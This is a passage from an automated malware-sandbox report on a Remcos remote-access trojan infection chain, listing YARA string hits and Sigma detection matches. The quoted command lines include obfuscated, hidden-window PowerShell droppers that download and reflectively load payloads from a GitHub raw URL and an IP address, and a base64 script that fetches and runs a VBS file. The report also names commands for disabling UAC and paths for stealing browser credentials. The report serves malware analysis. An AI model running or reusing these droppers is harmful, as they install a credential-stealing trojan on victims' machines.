                14.2.powershell.exe.1239d998.1.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  14.2.powershell.exe.1239d998.1.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    14.2.powershell.exe.1239d998.1.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x690b8:$a1: Remcos restarted by watchdog!
                    • 0x69630:$a3: %02i:%02i:%02i:%03i
                    14.2.powershell.exe.1239d998.1.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x6310c:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x6317c:$str_b2: Executing file:
                    • 0x641fc:$str_b3: GetDirectListeningPort
                    • 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x63d28:$str_b7: \update.vbs
                    • 0x631a4:$str_b9: Downloaded file:
                    • 0x63190:$str_b10: Downloading file:
                    • 0x63234:$str_b12: Failed to upload file:
                    • 0x641c4:$str_b13: StartForward
                    • 0x641e4:$str_b14: StopForward
                    • 0x63c80:$str_b15: fso.DeleteFile "
                    • 0x63c14:$str_b16: On Error Resume Next
                    • 0x63cb0:$str_b17: fso.DeleteFolder "
                    • 0x63224:$str_b18: Uploaded file:
                    • 0x631e4:$str_b19: Unable to delete:
                    • 0x63c48:$str_b20: while fso.FileExists("
                    • 0x636c1:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 18 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System3
                    Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3432, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Newprojectupdatedwithmegreat[1].hta
                    Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3836, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS" , ProcessId: 4028, ProcessName: wscript.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System3
